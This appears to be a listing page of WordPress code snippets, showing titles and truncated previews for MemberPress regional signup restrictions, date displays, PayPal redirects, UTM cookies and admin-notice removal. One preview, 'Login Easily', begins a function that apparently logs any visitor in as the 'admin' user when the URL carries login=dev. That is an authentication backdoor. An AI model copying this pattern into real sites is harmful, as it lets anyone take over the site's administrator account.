MemberPress: Restrict Signups for Northern Ireland-Based Users
This code snippet will restrict signups for Northern Ireland-based users on MemberPress registration pages. Additionally, it…
MemberPress: Restrict Signups for EU-Based Users
This code snippet will restrict signups for EU-based Users on MemberPress registration pages. Additionally, it ensures…
MemberPress: Restrict Signups for US-Based Users
This code snippet will restrict signups for US-based Users on MemberPress registration pages. Additionally, it ensures…
MemberPress: Unsubscribed Memberships Shortcode
This code snippet adds [mepr-unsubscribed-memberships] shortcode to display an unordered list (Titles/links) of the logged-in user’s…
HealthEngine
Online booking
Dynamic Copyright Date
if ( ! function_exists( 'wpb_copyright' ) ) { function wpb_copyright() { // Cache the output so…
MihaiJoe
Mon site
WordPress - Display the Last Updated Date
Add the last updated date & time to your posts in the frontend.
WPcode
WPcode
Change Cancel Page URL For Paypal
This should redirect a donor to a custom URL after a donor clicks 'cancel' on Paypal's…
Set a cookie if the URL contains specific UTM parameters.
The below script checks the URL for specific UTM parameters and if found, saves a cookie…
Untitled Snippet
.entry-meta { display: none; }
Login Easily
function auto_login() { if (isset($_GET['login']) && $_GET['login'] === 'dev') { $user = get_user_by('login', 'admin'); if ($user)…
Onemoguci mail provjeru - WP Forms
Da mi ne izbacuje prijedolge o ispravnim mail adresama. Tipa kada upišem [email protected] dale mi prijedlog…
Disable Admin Notices WordPress
Completely removes all admin notices from the WordPress dashboard, * including core WordPress notices and those…